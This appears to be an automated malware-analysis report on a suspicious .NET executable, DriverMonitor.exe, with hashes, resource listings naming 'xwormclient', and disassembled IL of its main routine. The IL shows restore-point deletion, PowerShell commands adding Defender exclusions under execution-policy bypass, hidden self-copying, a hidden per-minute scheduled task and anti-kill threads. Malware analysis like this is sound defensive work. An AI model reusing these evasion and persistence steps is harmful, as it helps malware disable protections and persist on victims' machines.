Suspicious
Suspect

1851dc48b25b34d01dce54dd74e1a7f0

PE Executable | MD5: 1851dc48b25b34d01dce54dd74e1a7f0 | Size: 237.57 KB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Low

Hash
Hash Value
MD5
1851dc48b25b34d01dce54dd74e1a7f0
Sha1
ba240969db2c865063a75f8186f2fc83860d52ae
Sha256
a21ea3be11dab8ff00566411bca41ea6c635ac29ed71bca8274da560387701c9
Sha384
777d50b93b6dff8d79f1cafb085901542eddc54c5bb0b6b0297be673b435c9bcd0a01ea001ce5e13786ea8d9fc25a0f6
Sha512
8f394bfa2f2b325f2ab38c0a5894db77934e9737a4a18a19b08eaefffbd861bb4f8b5fc4de7ff70704da05eb8493ee4de6283ee513ccd3d898412221b4aba450
SSDeep
3072:ZgtSlj8czn5FQ7DgOsctA/qFQBEHBAnpK37nXN8t005Q5cvPsE74tyJhbSKsIS0g:0Sr5FI8Od0q98PnvPzkgm5jwzXR9
TLSH
1B346C112BF8C92BEBBF5BB5E0B112102774E10BA561EB4A388C25F95B233415D527BF
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
fwybnjppcwzrwu.Resources
xwormclient
Microsoft.Win32.TaskScheduler.Properties.Resources.resources
Microsoft.Win32.TaskScheduler.V1.TaskSchedulerV1Schema.xsd
Microsoft.Win32.TaskScheduler.TaskService.bmp
Information
Module Name: DriverMonitor.exe
Full Name: DriverMonitor.exe
EntryPoint: System.Void Program::main()
Scope Name: DriverMonitor.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: DriverMonitor
Assembly Version: 1.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: <null>
Total Strings: 520
Main Method: System.Void Program::main()
Main IL Instruction Count: 272

Main IL

call System.Boolean Program::CreateMutex() brtrue IL_0010: ldsfld System.String Settings::Current ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldsfld System.String Settings::Current ldsfld System.String Settings::Workpath ldstr \ ldsfld System.String Settings::HName call System.String System.String::Concat(System.String,System.String,System.String) ldc.i4.0 <null> call System.Int32 Microsoft.VisualBasic.CompilerServices.Operators::CompareString(System.String,System.String,System.Boolean) ldc.i4.0 <null> bne.un IL_00F6: call System.Boolean Program::AdminCheck() call System.Void Program::PreventSleep() ldnull <null> ldftn System.Void Program::TaskSchedulerKill() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.0 <null> ldloc.0 <null> callvirt System.Void System.Threading.Thread::Start() ldnull <null> ldftn System.Void Program::SuperHidden() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldsfld System.Collections.Generic.List`1<System.String> Settings::List callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.2 <null> br IL_00A7: ldloca.s V_2 ldloca.s V_2 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.3 <null> ldnull <null> ldftn System.Void Program::Memory(System.Object) newobj System.Void System.Threading.ParameterizedThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ParameterizedThreadStart) stloc.s V_4 ldloc.s V_4 ldloc.3 <null> call System.String 
Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Byte[] Program::GetTheResource(System.String) callvirt System.Void System.Threading.Thread::Start(System.Object) ldloca.s V_2 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue.s IL_007A: ldloca.s V_2 leave IL_00C3: call System.Boolean Program::AdminCheck() ldloca.s V_2 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> call System.Boolean Program::AdminCheck() brfalse IL_00D2: ldnull call System.Void ProcessCritical::CriticalProcess_Enable() ldnull <null> ldftn System.Void Program::CAntiKill() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.s V_5 ldloc.s V_5 callvirt System.Void System.Threading.Thread::Start() call System.Void System.Windows.Forms.Application::Run() br IL_0417: ret call System.Boolean Program::AdminCheck() brtrue IL_0116: call System.Boolean Program::AdminCheck() ldsfld System.String Settings::Current call System.Boolean Program::Execute(System.String) pop <null> call System.Void Program::CloseMutex() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Boolean Program::AdminCheck() brfalse IL_01B4: call System.Boolean Program::AdminCheck() ldstr \\.\root\default ldstr systemrestore newobj System.Void System.Management.ObjectGetOptions::.ctor() newobj System.Void System.Management.ManagementClass::.ctor(System.String,System.String,System.Management.ObjectGetOptions) stloc.s V_6 ldloc.s V_6 callvirt System.Management.ManagementObjectCollection System.Management.ManagementClass::GetInstances() stloc.s V_7 ldloc.s V_7 callvirt System.Management.ManagementObjectCollection/ManagementObjectEnumerator System.Management.ManagementObjectCollection::GetEnumerator() stloc.s V_8 br 
IL_0180: ldloc.s V_8 ldloc.s V_8 callvirt System.Management.ManagementBaseObject System.Management.ManagementObjectCollection/ManagementObjectEnumerator::get_Current() castclass System.Management.ManagementObject stloc.s V_9 ldloc.s V_9 ldstr sequencenumber callvirt System.Object System.Management.ManagementBaseObject::get_Item(System.String) call System.UInt32 Microsoft.VisualBasic.CompilerServices.Conversions::ToUInteger(System.Object) stloc.s V_10 ldloca.s V_10 call System.String System.UInt32::ToString() call System.Int32 Microsoft.VisualBasic.CompilerServices.Conversions::ToInteger(System.String) call System.Int32 Program::SRRemoveRestorePoint(System.Int32) pop <null> ldloc.s V_8 callvirt System.Boolean System.Management.ManagementObjectCollection/ManagementObjectEnumerator::MoveNext() brtrue.s IL_014D: ldloc.s V_8 leave IL_019D: leave IL_01B4 ldloc.s V_8 brfalse IL_019C: endfinally ldloc.s V_8 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_01B4: call System.Boolean Program::AdminCheck() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_11 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_01B4: call System.Boolean Program::AdminCheck() call System.Boolean Program::AdminCheck() brfalse IL_0252: ldsfld System.String Settings::Workpath newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.s V_12 ldloc.s V_12 ldstr powershell.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.s V_12 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.s V_12 ldstr -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath ' ldsfld System.String Settings::Workpath ldstr \ ldsfld System.String Settings::HName call System.String System.String::Concat(System.String,System.String,System.String) 
call System.String System.IO.Path::GetFullPath(System.String) ldstr ' call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_12 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() ldloc.s V_12 ldstr -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess ' ldsfld System.String Settings::HName ldstr ' call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_12 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() leave IL_0252: ldsfld System.String Settings::Workpath dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_13 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_0252: ldsfld System.String Settings::Workpath ldsfld System.String Settings::Workpath ldstr \ ldsfld System.String Settings::HName call System.String System.String::Concat(System.String,System.String,System.String) call System.Boolean System.IO.File::Exists(System.String) brfalse IL_029E: ldc.i4 1000 ldsfld System.String Settings::Workpath ldstr \ ldsfld System.String Settings::HName call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_14 ldloc.s V_14 ldc.i4 128 callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) ldloc.s V_14 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String 
Settings::Workpath ldstr \ ldsfld System.String Settings::HName call System.String System.String::Concat(System.String,System.String,System.String) ldsfld System.String Settings::Current call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave IL_02E2: ldsfld System.String Settings::Workpath dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_15 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_02E2: ldsfld System.String Settings::Workpath ldsfld System.String Settings::Workpath ldstr \ ldsfld System.String Settings::HName call System.String System.String::Concat(System.String,System.String,System.String) ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) leave IL_0313: newobj System.Void Microsoft.Win32.TaskScheduler.TaskService::.ctor() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_16 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_0313: newobj System.Void Microsoft.Win32.TaskScheduler.TaskService::.ctor() newobj System.Void Microsoft.Win32.TaskScheduler.TaskService::.ctor() stloc.s V_17 ldloc.s V_17 callvirt Microsoft.Win32.TaskScheduler.TaskDefinition Microsoft.Win32.TaskScheduler.TaskService::NewTask() stloc.s V_18 newobj System.Void Microsoft.Win32.TaskScheduler.TimeTrigger::.ctor() stloc.s V_19 ldloc.s V_19 callvirt Microsoft.Win32.TaskScheduler.RepetitionPattern Microsoft.Win32.TaskScheduler.Trigger::get_Repetition() ldc.r8 1 call System.TimeSpan System.TimeSpan::FromMinutes(System.Double) callvirt System.Void Microsoft.Win32.TaskScheduler.RepetitionPattern::set_Interval(System.TimeSpan) ldloc.s V_18 callvirt Microsoft.Win32.TaskScheduler.TriggerCollection 
Microsoft.Win32.TaskScheduler.TaskDefinition::get_Triggers() ldloc.s V_19 callvirt Microsoft.Win32.TaskScheduler.Trigger Microsoft.Win32.TaskScheduler.TriggerCollection::Add(Microsoft.Win32.TaskScheduler.Trigger) pop <null> call System.Boolean Program::AdminCheck() brfalse IL_036A: ldloc.s V_18 ldloc.s V_18 callvirt Microsoft.Win32.TaskScheduler.TaskPrincipal Microsoft.Win32.TaskScheduler.TaskDefinition::get_Principal() ldc.i4.1 <null> callvirt System.Void Microsoft.Win32.TaskScheduler.TaskPrincipal::set_RunLevel(Microsoft.Win32.TaskScheduler.TaskRunLevel) ldloc.s V_18 callvirt Microsoft.Win32.TaskScheduler.TaskSettings Microsoft.Win32.TaskScheduler.TaskDefinition::get_Settings() ldc.i4.1 <null> callvirt System.Void Microsoft.Win32.TaskScheduler.TaskSettings::set_Hidden(System.Boolean) ldloc.s V_18 callvirt Microsoft.Win32.TaskScheduler.ActionCollection Microsoft.Win32.TaskScheduler.TaskDefinition::get_Actions() ldsfld System.String Settings::Workpath ldstr \ ldsfld System.String Settings::HName call System.String System.String::Concat(System.String,System.String,System.String) ldnull <null> ldnull <null> newobj System.Void Microsoft.Win32.TaskScheduler.ExecAction::.ctor(System.String,System.String,System.String) callvirt Microsoft.Win32.TaskScheduler.Action Microsoft.Win32.TaskScheduler.ActionCollection::Add(Microsoft.Win32.TaskScheduler.Action) pop <null> ldloc.s V_17 callvirt Microsoft.Win32.TaskScheduler.TaskFolder Microsoft.Win32.TaskScheduler.TaskService::get_RootFolder() ldsfld System.String Settings::TaskName ldloc.s V_18 callvirt Microsoft.Win32.TaskScheduler.Task Microsoft.Win32.TaskScheduler.TaskFolder::RegisterTaskDefinition(System.String,Microsoft.Win32.TaskScheduler.TaskDefinition) pop <null> ldc.i4 3000 call System.Void System.Threading.Thread::Sleep(System.Int32) call System.Void Program::CloseMutex() ldloc.s V_17 ldsfld System.String Settings::TaskName ldc.i4.1 <null> callvirt Microsoft.Win32.TaskScheduler.Task 
Microsoft.Win32.TaskScheduler.TaskService::FindTask(System.String,System.Boolean) stloc.s V_20 ldloc.s V_20 brfalse IL_03E6: ldc.i4.0 ldloc.s V_20 ldc.i4.0 <null> newarr System.String callvirt Microsoft.Win32.TaskScheduler.RunningTask Microsoft.Win32.TaskScheduler.Task::Run(System.String[]) pop <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) leave IL_0400: leave IL_0417 ldloc.s V_17 brfalse IL_03FF: endfinally ldloc.s V_17 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_0417: ret dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_21 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_0417: ret ret <null>

Characteristics
No malware configuration was found at this point.